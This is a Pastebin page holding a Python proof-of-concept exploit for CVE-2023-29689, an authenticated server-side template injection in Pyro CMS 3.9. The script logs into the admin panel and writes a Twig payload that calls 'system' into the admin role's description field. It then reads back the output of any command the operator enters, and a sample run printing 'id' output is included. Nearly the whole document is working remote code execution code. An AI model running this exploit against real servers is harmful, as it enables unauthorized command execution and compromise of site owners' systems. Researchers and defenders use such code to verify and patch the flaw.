API tools faq
paste
Advertisement
FlyFar

Pyro CMS 3.9 - Server-Side Template Injection (SSTI) (Authenticated) - CVE-2023-29689

FlyFar
Jan 21st, 2024
1,118
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 2.66 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. # Exploit Title: Pyro CMS 3.9 - Server-Side Template Injection (SSTI) (Authenticated)
  2. # Exploit Author: Daniel Barros (@cupc4k3d) - Hakai Offensive Security
  3. # Date: 03/08/2023
  4. # Vendor: https://pyrocms.com/
  5. # Software Link: https://pyrocms.com/documentation/pyrocms/3.9/getting-started/installation
  6. # Vulnerable Version(s): 3.9
  7. # CVE: CVE-2023-29689
  8. # Notes: You need a user who has access to /admin privilege
  9.  
  10. # Example Usage:
  11. # First, run the script: python3 CVE-2023-29689.py
  12. # Please follow these steps:
  13. # 1. Enter the application URL: http://localhost:8000
  14. # 2. Enter the email for authentication: admin@adm.com
  15. # 3. Enter the password: Admin@@2023
  16. # 4. Enter the command to be executed: id
  17. # Result of command execution:
  18. # uid=1000(cupcake) gid=1000(cupcake) groups=1000(cupcake)
  19.  
  20. import requests
  21. from bs4 import BeautifulSoup
  22. from urllib.parse import urljoin
  23.  
  24. def login(session, url, email, password):
  25.     login_url = urljoin(url, '/admin/login')
  26.     response = session.get(login_url)
  27.     soup = BeautifulSoup(response.content, 'html.parser')
  28.     token = soup.find('input', {'name': '_token'})['value']
  29.  
  30.     payload = {
  31.         '_token': token,
  32.         'email': email,
  33.         'password': password
  34.     }
  35.  
  36.     session.post(login_url, data=payload)
  37.  
  38. # Function to edit role 1 and extract the Description of the Admin user.
  39. def edit_role_and_extract_description(session, url, command):
  40.     edit_role_url = urljoin(url, '/admin/users/roles/edit/1')
  41.     response = session.get(edit_role_url)
  42.     soup = BeautifulSoup(response.content, 'html.parser')
  43.     token = soup.find('input', {'name': '_token'})['value']
  44.  
  45.     payload = {
  46.         '_token': token,
  47.         'name_en': 'Admin',
  48.         'slug': 'admin',
  49.         'description_en': f'{{{{["{command}"]|map("system")|join}}}}',
  50.         'action': 'save_exit'
  51.     }
  52.  
  53.     session.post(edit_role_url, data=payload)
  54.  
  55.     # Extract the updated Description from role 1.
  56.     response = session.get(urljoin(url, '/admin/users/roles'))
  57.     soup = BeautifulSoup(response.content, 'html.parser')
  58.     description = soup.find('td', {'data-title': 'Description'}).text.strip()
  59.  
  60.     return description
  61.    
  62. def main():
  63.     url = input("Enter the application URL: ")
  64.     email = input("Enter the email for authentication: ")
  65.     password = input("Enter the password : ")
  66.     command = input("Enter the command to be executed: ")
  67.  
  68.     with requests.Session() as session:
  69.         login(session, url, email, password)
  70.         description = edit_role_and_extract_description(session, url, command)
  71.         print("\nResult of command execution:")
  72.         print(description)
  73.  
  74. if __name__ == "__main__":
  75.     main()
  76.            
Tags: Exploit CVE Vulnerability
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!